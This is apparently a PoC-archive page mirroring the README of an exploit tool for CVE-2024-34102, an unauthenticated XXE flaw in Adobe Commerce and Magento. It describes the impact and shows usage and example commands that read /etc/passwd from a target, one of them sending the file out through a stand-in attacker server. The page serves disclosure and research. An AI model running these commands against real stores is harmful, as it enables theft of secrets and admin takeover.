关联漏洞
Description
CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)
介绍
# CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)
CVE-2024-34102 is a severe security flaw arising from improper handling of nested deserialization in Adobe Commerce and Magento. This vulnerability permits attackers to exploit XML External Entities (XXE) during the deserialization process, potentially allowing remote code execution. In short, attackers can craft malicious JSON payloads that, when deserialized by the application, instantiate objects with unintended properties or behaviors. This could lead to various security risks.
Exploiting this vulnerability allows attackers to gain unauthorized admin access to REST API, GraphQL API, or SOAP API, potentially leading to data theft, service disruption, and complete compromise of affected systems. This vulnerability poses a significant risk due to its ability to exfiltrate sensitive files, such as app/etc/env.php, containing cryptographic keys used for authentication. Attackers can exploit this to forge administrator tokens and manipulate Magento's APIs as privileged users.
Moreover, CVE-2024-34102 can be chained with other vulnerabilities, such as the PHP filter chains exploit (CVE-2024-2961), leading to remote code execution (RCE). The broader implications of XML External Entity (XXE) vulnerabilities enable attackers to retrieve and manipulate data from external sources, exacerbating the potential impact on compromised systems.
## Usage
```
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]
Exploit script for XXE vulnerability
options:
-h, --help show this help message and exit
--target TARGET, -t TARGET
Target URL (http(s)://ip[:port])
--read-file READ_FILE, -r READ_FILE
File to read from the remote host
--oob-server OOB_SERVER, -ob OOB_SERVER
OOB server URL (http(s)://ip[:port])
--host-server HOST_SERVER, -hs HOST_SERVER
Host server URL (http(s)://ip[:port])
```
Examples
```bash
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"
# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"
# Detection
python3 detect.py -t https://magento.test
```
## Disclaimer
This exploit script has been created solely for the purposes of research and for the development of effective defensive techniques. It is not intended to be used for any malicious or unauthorized activities. The author and the owner of the script disclaim any responsibility or liability for any misuse or damage caused by this software. Users are urged to use this software responsibly and only in accordance with applicable laws and regulations. Use responsibly.
文件快照
[4.0K] /data/pocs/e87abe819bc4391dff7edcb477d902317e4598d7
├── [4.6K] detect.py
├── [4.5K] exploit.py
├── [1.0K] LICENSE
└── [2.9K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →